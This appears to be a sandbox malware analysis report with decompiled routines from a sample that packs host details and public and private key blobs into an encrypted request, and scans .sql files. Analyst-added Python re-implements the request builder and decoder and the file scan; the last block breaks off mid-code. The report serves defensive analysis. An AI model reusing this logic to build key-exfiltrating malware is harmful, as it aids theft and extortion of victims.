                                        				char _v456;
                                        				CHAR* _v464;
                                        				int _v468;
                                        				void* _v472;
                                        				BYTE* _v476;
                                        				WCHAR* _v480;
                                        				WCHAR* _v484;
                                        				void* _v488;
                                        				void* _v492;
                                        				short* _v496;
                                        				CHAR* _v500;
                                        				void* _v504;
                                        				long _v508;
                                        				CHAR* _v512;
                                        				CHAR* _v528;
                                        				CHAR* _t133;
                                        				void* _t135;
                                        				int _t145;
                                        				void* _t148;
                                        				int _t149;
                                        				void* _t150;
                                        				void* _t152;
                                        				signed int _t159;
                                        				signed int _t163;
                                        				void* _t170;
                                        				signed int _t172;
                                        				CHAR* _t185;
                                        				long _t189;
                                        				intOrPtr _t199;
                                        				int _t200;
                                        				void _t202;
                                        				int _t203;
                                        				void _t204;
                                        				int _t205;
                                        				long _t213;
                                        				void* _t219;
                                        				short _t228;
                                        				char* _t229;
                                        				WCHAR* _t231;
                                        				short _t233;
                                        				CHAR* _t234;
                                        				char _t235;
                                        				void* _t238;
                                        				long _t240;
                                        				long _t241;
                                        				void* _t243;
                                        				void* _t245;
                                        				short _t248;
                                        				int _t249;
                                        				void* _t255;
                                        				CHAR* _t256;
                                        				WCHAR* _t258;
                                        				WCHAR* _t259;
                                        				signed int _t261;
                                        				CHAR* _t262;
                                        				CHAR* _t263;
                                        				signed int _t266;
                                        				int _t267;
                                        				void* _t268;
                                        				long _t271;
                                        				void* _t272;
                                        				void* _t273;
                                        				long _t279;
                                        				int _t280;
                                        				long _t281;
                                        				void* _t282;
                                        				CHAR* _t283;
                                        				short _t284;
                                        
                                        				_push(__ecx);
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				_v456 = __ecx;
                                        				_v436 = __edx;
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				E0F9D39F0( &_v404);
                                        				E0F9D7330( &_v492, __edx);
                                        				_t255 = E0F9D7140( &_v492);
                                        				_t266 = _a8 + __edx;
                                        				_t7 = _t266 + 8; // 0x8
                                        				_t213 = _t255 + _t7 * 8 << 3;
                                        				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40);
                                        				_t248 = 0;
                                        				_v512 = _t133;
                                        				_v528 = _t133;
                                        				_t228 = 0x30 + (_t255 + _t266 * 4) * 8;
                                        				if(_t133 == 0 || _t228 >= _t213) {
                                        					_v448 = _t248;
                                        					_t256 = _t133;
                                        				} else {
                                        					_t256 =  &(_t133[_t228]);
                                        					_v448 = _t133;
                                        					_v444 = _t256;
                                        					_t248 = _t228;
                                        				}
                                        				_t135 = 2 + _a8 * 8;
                                        				if(_v428 == 0) {
                                        					L7:
                                        					_t229 = 0;
                                        					_v432 = 0;
                                        				} else {
                                        					_t284 = _t248 + _t135;
                                        					if(_t284 >= _t213) {
                                        						goto L7;
                                        					} else {
                                        						_t229 = _t256;
                                        						_v432 = _t256;
                                        						_t256 =  &(_t256[_t135]);
                                        						_t248 = _t284;
                                        						_v444 = _t256;
                                        					}
                                        				}
                                        				_t267 = _v440;
                                        				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
                                        					_t256 = 0;
                                        					_v444 = 0;
                                        				}
                                        				if(_t229 == 0) {
                                        					goto L53;
                                        				} else {
                                        					_t249 = _a8;
                                        					_v436 = _t249 + _t249;
                                        					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
                                        					_v452 = _t267 + _t267;
                                        					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
                                        					_t145 = lstrlenA(_t256);
                                        					_t271 = _t145 + lstrlenA(_v464) + 0x42;
                                        					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40);
                                        					_v472 = _t148;
                                        					_v488 = _t148;
                                        					_v492 = 0;
                                        					_t149 = lstrlenA(_v464);
                                        					_t231 = _v472;
                                        					_t150 = _t149 + 1;
                                        					if(_t231 == 0 || _t150 >= _t271) {
                                        						_v484 = 0;
                                        					} else {
                                        						_v492 = _t150;
                                        						_v488 = _t231 + _t150;
                                        						_v484 = _t231;
                                        					}
                                        					_t152 = lstrlenA(_t256) + 1;
                                        					if(_v472 == 0 || _t152 + _v492 >= _t271) {
                                        						_v488 = 0;
                                        					}
                                        					_t272 = 0;
                                        					if(lstrlenA(_v464) != 0) {
                                        						_t245 = _v484;
                                        						_t263 = _v464;
                                        						_v492 = _t245;
                                        						do {
                                        							_t204 =  *((intOrPtr*)(_t272 + _t263));
                                        							if(_t204 != 0xa && _t204 != 0xd) {
                                        								 *_t245 = _t204;
                                        								_v492 = _t245 + 1;
                                        							}
                                        							_t272 = _t272 + 1;
                                        							_t205 = lstrlenA(_t263);
                                        							_t245 = _v492;
                                        						} while (_t272 < _t205);
                                        						_t256 = _v476;
                                        					}
                                        					_t273 = 0;
                                        					if(lstrlenA(_t256) != 0) {
                                        						_t243 = _v488;
                                        						_v492 = _t243;
                                        						do {
                                        							_t202 =  *((intOrPtr*)(_t273 + _t256));
                                        							if(_t202 != 0xa && _t202 != 0xd) {
                                        								 *_t243 = _t202;
                                        								_v492 = _t243 + 1;
                                        							}
                                        							_t273 = _t273 + 1;
                                        							_t203 = lstrlenA(_t256);
                                        							_t243 = _v492;
                                        						} while (_t273 < _t203);
                                        					}
                                        					_t258 = _v480;
                                        					lstrcatW(_t258, L"action=call&");
                                        					_t259 =  &(_t258[lstrlenW(_t258)]);
                                        					E0F9D6F40( &_v440, _t259);
                                        					lstrcatW(_t259, L"&pub_key=");
                                        					_t159 = lstrlenW(_t259);
                                        					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
                                        					lstrcatW(_t259, L"&priv_key=");
                                        					_t163 = lstrlenW(_t259);
                                        					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
                                        					lstrcatW(_t259, L"&version=2.3r");
                                        					_t279 = (lstrlenW(_v484) << 4) + 0x12;
                                        					_t219 = VirtualAlloc(0, _t279, 0x3000, 0x40);
                                        					_v480 = _t219;
                                        					_t170 = 2 + lstrlenW(_v484) * 8;
                                        					if(_t219 == 0 || _t170 >= _t279) {
                                        						_v492 = 0;
                                        					} else {
                                        						_v492 = _t219;
                                        					}
                                        					_t172 = lstrlenW(_v480);
                                        					_t233 = "#shasj"; // 0x61687323
                                        					_t261 = _t172;
                                        					asm("movq xmm0, [0xf9dfc78]");
                                        					_v448 = _t233;
                                        					_t234 =  *0xf9dfc84; // 0x6a73
                                        					_v444 = _t234;
                                        					_t235 =  *0xf9dfc86; // 0x0
                                        					asm("movq [esp+0x3c], xmm0");
                                        					_v442 = _t235;
                                        					_v296 = 0;
                                        					E0F9D9010( &_v295, 0, 0xff);
                                        					E0F9D5D70( &_v296,  &_v456, lstrlenA( &_v456));
                                        					_t280 = _t261 + _t261;
                                        					E0F9D5E20( &_v296, _v480, _t280);
                                        					_t262 = _v492;
                                        					_v468 = _t261 * 8;
                                        					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
                                        						GetLastError();
                                        					}
                                        					_t105 = lstrlenA(_t262) + 2; // 0x2
                                        					_t281 = _t105;
                                        					_v504 = VirtualAlloc(0, _t281, 0x3000, 0x40);
                                        					_t107 = lstrlenA(_t262) + 1; // 0x1
                                        					_t238 = _t107;
                                        					_t185 = _v504;
                                        					if(_t185 == 0) {
                                        						L40:
                                        						_v500 = 0;
                                        					} else {
                                        						_v500 = _t185;
                                        						if(_t238 >= _t281) {
                                        							goto L40;
                                        						}
                                        					}
                                        					_t282 = 0;
                                        					if(lstrlenA(_t262) != 0) {
                                        						_t241 = _v500;
                                        						_v508 = _t241;
                                        						do {
                                        							_t199 =  *((intOrPtr*)(_t282 + _t262));
                                        							if(_t199 != 0xa && _t199 != 0xd) {
                                        								 *_t241 = _t199;
                                        								_v508 = _t241 + 1;
                                        							}
                                        							_t282 = _t282 + 1;
                                        							_t200 = lstrlenA(_t262);
                                        							_t241 = _v508;
                                        						} while (_t282 < _t200);
                                        					}
                                        					_t283 = _v500;
                                        					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
                                        					_v508 = 0;
                                        					_t189 = E0F9D54A0(_t283,  &_v508, 1);
                                        					if(_t189 != 0) {
                                        						_t240 = _v508;
                                        						if(_t240 != 0) {
                                        							 *_a12 = _t240;
                                        						}
                                        						VirtualFree(_v504, 0, 0x8000);
                                        						VirtualFree(_v492, 0, 0x8000);
                                        						VirtualFree(_v488, 0, 0x8000);
                                        						L53:
                                        						_t268 = 1;
                                        					} else {
                                        						VirtualFree(_v504, _t189, 0x8000);
                                        						VirtualFree(_v492, 0, 0x8000);
                                        						VirtualFree(_v488, 0, 0x8000);
                                        						_t268 = 0;
                                        					}
                                        				}
                                        				VirtualFree(_v428, 0, 0x8000);
                                        				E0F9D7C10( &_v408);
                                        				return _t268;
                                        			}

                                        Address column from the side-by-side listing (one address per pseudocode statement, from _push(__ecx) to return _t268): 0x0f9d588f through 0x0f9d5d6d.
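The routine above base64-encodes two key blobs with CryptBinaryToStringA (flag 0x40000001 = CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF), strips any stray 0x0A/0x0D bytes, concatenates "action=call&", the host information string, "&pub_key=", "&priv_key=" and "&version=2.3r" into a wide-character buffer, encrypts that buffer for lstrlenW*2 bytes through a 256-byte state keyed from a hard-coded string (E0F9D5D70 / E0F9D5E20), base64-encodes the result and hands it to E0F9D54A0. The Python below is an added example, not code from the sample, from Joe Sandbox or from this report: it reproduces that pipeline and its inverse so that a captured request body can be decoded when the key is known. Assumptions, labelled in the code as well: the 256-byte state and the two calls are treated as an RC4 key schedule and keystream (the page does not name the cipher); RC4_KEY is a hypothetical key built from the visible fragment "#shasj", not the sample's real key; the host-information field names and the two key blobs are constructed inputs.

```python
"""Emulate and reverse the request-building routine shown in the listing.

Added example for this report; not code from the sample, from Joe Sandbox or
from the report itself. Labelled assumptions:
  * the 256-byte state zeroed at _v296 and passed to E0F9D5D70 / E0F9D5E20 is
    an RC4 key schedule and keystream (the page does not name the cipher);
  * RC4_KEY is a hypothetical key built from the visible fragment "#shasj";
  * the sysinfo field names and the two key blobs are constructed inputs.
"""
import base64

RC4_KEY = b"#shasj_hypothetical"  # placeholder, not the sample's real key


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA, then PRGA XOR). Symmetric, so it also decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def b64_nocrlf(data: bytes) -> str:
    """CryptBinaryToStringA(..., 0x40000001, ...) is BASE64 | NOCRLF; the sample
    still strips 0x0A/0x0D from the output afterwards, so both are mirrored here."""
    return base64.b64encode(data).decode("ascii").replace("\r", "").replace("\n", "")


def build_request(sysinfo: str, pub_key: bytes, priv_key: bytes, key: bytes = RC4_KEY) -> str:
    """Plaintext in the order the lstrcatW calls append it; the wide buffer is then
    encrypted for lstrlenW*2 bytes (UTF-16LE, no terminator) and base64-encoded."""
    plain = ("action=call&" + sysinfo
             + "&pub_key=" + b64_nocrlf(pub_key)
             + "&priv_key=" + b64_nocrlf(priv_key)
             + "&version=2.3r")
    return b64_nocrlf(rc4(key, plain.encode("utf-16-le")))


def decode_request(body: str, key: bytes = RC4_KEY) -> dict:
    """Inverse for a captured body: base64 -> RC4 -> UTF-16LE -> fields.
    Split by hand instead of urllib.parse: the values are raw base64 that was
    never URL-encoded, so a '+' must not be turned into a space."""
    plain = rc4(key, base64.b64decode(body)).decode("utf-16-le")
    fields = {}
    for segment in plain.split("&"):
        name, _, value = segment.partition("=")  # first '=' only; b64 padding survives
        fields[name] = value
    for name in ("pub_key", "priv_key"):
        if name in fields:
            fields[name] = base64.b64decode(fields[name])
    return fields


if __name__ == "__main__":
    # Constructed inputs. The real routine fills sysinfo from GetUserNameW,
    # GetComputerNameW and the LocaleName registry value; these field names are hypothetical.
    sysinfo = "pc_user=alice&pc_name=LAB-PC&pc_lang=en-US"
    pub, priv = bytes(range(16)), bytes(range(255, 223, -1))
    body = build_request(sysinfo, pub, priv)
    print(body)
    print(decode_request(body))
```

Because the cipher is symmetric and keyed from a constant string in the binary, the same function that the sample uses to protect the request also lets an analyst recover pub_key, priv_key and the host fields from a packet capture once the key string has been lifted from the unpacked image; the version marker "2.3r" is a fixed token in the plaintext and is a convenient sanity check that the key and decoding order were right.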

                                        APIs
                                          • Part of subcall function 0F9D39F0: GetProcessHeap.KERNEL32(?,?,0F9D4637,00000000,?,00000000,00000000), ref: 0F9D3A8C
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F9D7357
                                          • Part of subcall function 0F9D7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0F9D7368
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F9D7386
                                          • Part of subcall function 0F9D7330: GetComputerNameW.KERNEL32 ref: 0F9D7390
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F9D73B0
                                          • Part of subcall function 0F9D7330: wsprintfW.USER32 ref: 0F9D73F1
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F9D740E
                                          • Part of subcall function 0F9D7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F9D7432
                                          • Part of subcall function 0F9D7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0F9D4640,?), ref: 0F9D7456
                                          • Part of subcall function 0F9D7330: RegCloseKey.ADVAPI32(00000000), ref: 0F9D7472
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7192
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D719D
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71B3
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71BE
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71D4
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71DF
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71F5
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(0F9D4966,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7200
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7216
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7221
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7237
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7242
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7261
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D726C
                                        • VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0F9D58F0
                                        • CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0F9D599A
                                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0F9D59B3
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D59BC
                                        • lstrlenA.KERNEL32(?), ref: 0F9D59C4
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0F9D59D5
                                        • lstrlenA.KERNEL32(?), ref: 0F9D59EF
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5A18
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5A38
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5A64
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5A75
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5A97
                                        • lstrcatW.KERNEL32(?,action=call&), ref: 0F9D5AB1
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5ABA
                                        • lstrcatW.KERNEL32(?,&pub_key=), ref: 0F9D5ACF
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5AD2
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5ADB
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,74CB69A0,00000000), ref: 0F9D5AF0
                                        • lstrcatW.KERNEL32(?,&priv_key=), ref: 0F9D5AFC
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5AFF
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5B0C
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,74CB69A0,00000000), ref: 0F9D5B21
                                        • lstrcatW.KERNEL32(?,&version=2.3r), ref: 0F9D5B2D
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5B39
                                        • VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 0F9D5B4D
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5B5D
                                        • lstrlenW.KERNEL32(?), ref: 0F9D5B7E
                                        • _memset.LIBCMT ref: 0F9D5BC7
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5BDA
                                          • Part of subcall function 0F9D5D70: _memset.LIBCMT ref: 0F9D5D9D
                                        • CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 0F9D5C26
                                        • GetLastError.KERNEL32 ref: 0F9D5C30
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5C37
                                        • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0F9D5C46
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5C51
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5C71
                                        • lstrlenA.KERNEL32(?), ref: 0F9D5C94
                                        • lstrlenA.KERNEL32(00000000), ref: 0F9D5CA3
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 0F9D5CB4
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5CE7
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5CF4
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D01
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D26
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D33
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D40
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D5D5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
                                        • String ID: #shasj$&priv_key=$&pub_key=$&version=2.3r$action=call&
                                        • API String ID: 2781787645-472827701
                                        • Opcode ID: 255cd6b7fce2ff359efd85a661351dd3fbec36fc6ca318337ea6fb5f227a63c6
                                        • Instruction ID: 0e4f7796f0be8b74af80200d39dc9013b07669d75eeaa73f59306592892bc88a
                                        • Opcode Fuzzy Hash: 255cd6b7fce2ff359efd85a661351dd3fbec36fc6ca318337ea6fb5f227a63c6
                                        • Instruction Fuzzy Hash: 6DE1EE71108302AFE720DF24CC84B6BBBE9EF88754F24891CF585A7291D774E915CBA6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0F9D6A40(WCHAR* __ecx) {
                                        				void* _v8;
                                        				void* _v12;
                                        				WCHAR* _v16;
                                        				WCHAR* _v20;
                                        				long _v24;
                                        				struct _WIN32_FIND_DATAW _v620;
                                        				int _t38;
                                        				struct _SECURITY_ATTRIBUTES* _t40;
                                        				int _t50;
                                        				WCHAR* _t52;
                                        				intOrPtr _t53;
                                        				void* _t54;
                                        				WCHAR* _t57;
                                        				long _t64;
                                        				WCHAR* _t66;
                                        				void* _t67;
                                        
                                        				_t66 = __ecx;
                                        				_v16 = __ecx;
                                        				_t52 =  &(_t66[lstrlenW(__ecx)]);
                                        				_v20 = _t52;
                                        				lstrcatW(_t66, "*");
                                        				_v8 = FindFirstFileW(_t66,  &_v620);
                                        				 *_t52 = 0;
                                        				_t53 = 0;
                                        				do {
                                        					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
                                        						goto L20;
                                        					} else {
                                        						lstrcatW(_t66,  &(_v620.cFileName));
                                        						_t38 = lstrlenW(_t66);
                                        						_t10 = _t38 - 1; // -1
                                        						_t57 =  &(_t66[_t10]);
                                        						if(_t38 == 0) {
                                        							L18:
                                        							_t53 = 0;
                                        							goto L19;
                                        						} else {
                                        							while( *_t57 != 0x2e) {
                                        								_t57 = _t57 - 2;
                                        								_t38 = _t38 - 1;
                                        								if(_t38 != 0) {
                                        									continue;
                                        								}
                                        								break;
                                        							}
                                        							if(_t38 == 0) {
                                        								goto L18;
                                        							} else {
                                        								_t40 = lstrcmpW(_t57, L".sql");
                                        								if(_t40 != 0) {
                                        									goto L18;
                                        								} else {
                                        									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
                                        									_t64 = GetFileSize(_t54, 0);
                                        									_v12 = 0;
                                        									if(_t64 < 0x40000000) {
                                        										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
                                        										if(_t67 != 0) {
                                        											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0F9D8100(_t67, "*******************") != 0) {
                                        												_t50 = lstrlenA("*******************");
                                        												_t15 = _t67 + 1; // 0x1
                                        												_v12 = E0F9D69E0(_t15 + _t50);
                                        											}
                                        											VirtualFree(_t67, 0, 0x8000);
                                        										}
                                        										_t66 = _v16;
                                        									}
                                        									CloseHandle(_t54);
                                        									_t53 = _v12;
                                        									if(_t53 == 0) {
                                        										L19:
                                        										 *_v20 = 0;
                                        										goto L20;
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        					break;
                                        					L20:
                                        				} while (FindNextFileW(_v8,  &_v620) != 0);
                                        				FindClose(_v8);
                                        				return _t53;
                                        			}
                                        Instruction addresses for the listing above: 0x0f9d6a4b to 0x0f9d6bdb

                                        APIs
                                        • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F9D6A52
                                        • lstrcatW.KERNEL32(00000000,0F9DFEC4), ref: 0F9D6A64
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F9D6A72
                                        • lstrcmpW.KERNEL32(?,0F9DFEC8,?,?), ref: 0F9D6A9C
                                        • lstrcmpW.KERNEL32(?,0F9DFECC,?,?), ref: 0F9D6AB2
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0F9D6AC4
                                        • lstrlenW.KERNEL32(00000000,?,?), ref: 0F9D6ACB
                                        • lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F9D6AFA
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F9D6B11
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F9D6B1C
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F9D6B3A
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F9D6B4F
                                        • lstrlenA.KERNEL32(*******************,?,?), ref: 0F9D6B6E
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F9D6B89
                                        • CloseHandle.KERNEL32(00000000,?,?), ref: 0F9D6B93
                                        • FindNextFileW.KERNEL32(?,?,?,?), ref: 0F9D6BBC
                                        • FindClose.KERNEL32(?,?,?), ref: 0F9D6BCD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
                                        • String ID: *******************$.sql
                                        • API String ID: 3616287438-58436570
                                        • Opcode ID: 7acef97b6cf5bf908ecdaaa8ee129a3ebd2e9f96ac06adc6bed569c35bb26690
                                        • Instruction ID: db7127e1794116e3484887351a720f12dd837b5ffa9690e8d09b30950e54e4e8
                                        • Opcode Fuzzy Hash: 7acef97b6cf5bf908ecdaaa8ee129a3ebd2e9f96ac06adc6bed569c35bb26690
                                        • Instruction Fuzzy Hash: 4441A671606216ABEB209F64CC49FAE77ACEF45715F608055F502E3182DB78AA50CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%
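Added example (analyst reconstruction, not code from the report or from the sample): the directory walk in E0F9D6A40 above, re-expressed in Python so its selection rules can be checked against real files. The decompiled listing shows a non-recursive FindFirstFileW/FindNextFileW walk, a case-sensitive lstrcmpW of the text after the last '.' in the full path against ".sql", a size guard (GetFileSize below 0x40000000), a presence test for the 19-asterisk literal, and then a pointer at buffer + 1 + lstrlenA(marker), i.e. a fixed offset of 20 bytes regardless of where the marker was found. What the sample does with those bytes (E0F9D69E0) is not in this section, so the example returns them raw. The names has_sql_suffix, extract_after_marker, scan_directory and demo, and the constructed files written by demo, are the example's own. Unlike the sample, which never checks the FindFirstFileW handle before using the find data, the example uses os.listdir and fails cleanly on a missing directory.

```python
"""Reconstruction of the .sql search in E0F9D6A40 (analyst example, see lead-in)."""
import os
import tempfile
from typing import Optional

MARKER = b"*" * 19            # the 19-asterisk literal the sample passes to lstrlenA
MAX_SIZE = 0x40000000         # files of 1 GiB or more are skipped (GetFileSize < 0x40000000)
PAYLOAD_OFFSET = 1 + len(MARKER)   # buffer + 1 + lstrlenA(marker): fixed offset 20, not the match position


def has_sql_suffix(path: str) -> bool:
    """lstrcmpW(last '.' in the full path, L".sql") == 0: exact and case-sensitive."""
    dot = path.rfind(".")
    return dot != -1 and path[dot:] == ".sql"


def extract_after_marker(data: bytes) -> Optional[bytes]:
    """If the marker occurs anywhere in the file, return the bytes from offset 20.
    The sample only tests for presence; it never uses where the marker was found."""
    if MARKER not in data:
        return None
    return data[PAYLOAD_OFFSET:]


def scan_directory(directory: str) -> Optional[bytes]:
    """Non-recursive walk; the first .sql file that yields a non-empty payload wins,
    mirroring the 'break' after a non-zero result in the decompiled loop."""
    for name in sorted(os.listdir(directory)):   # FindFirstFile order is filesystem-dependent
        full = os.path.join(directory, name)
        if not has_sql_suffix(full) or not os.path.isfile(full):
            continue
        if os.path.getsize(full) >= MAX_SIZE:
            continue
        with open(full, "rb") as fh:
            payload = extract_after_marker(fh.read())
        if payload:
            return payload
    return None


def demo() -> Optional[bytes]:
    """Constructed sample directory (not captured data): one decoy with the wrong
    suffix and one file laid out the way the sample's fixed offset expects."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "notes.txt"), "wb") as fh:
            fh.write(MARKER + b"\nignored: wrong suffix")
        with open(os.path.join(d, "dump.sql"), "wb") as fh:
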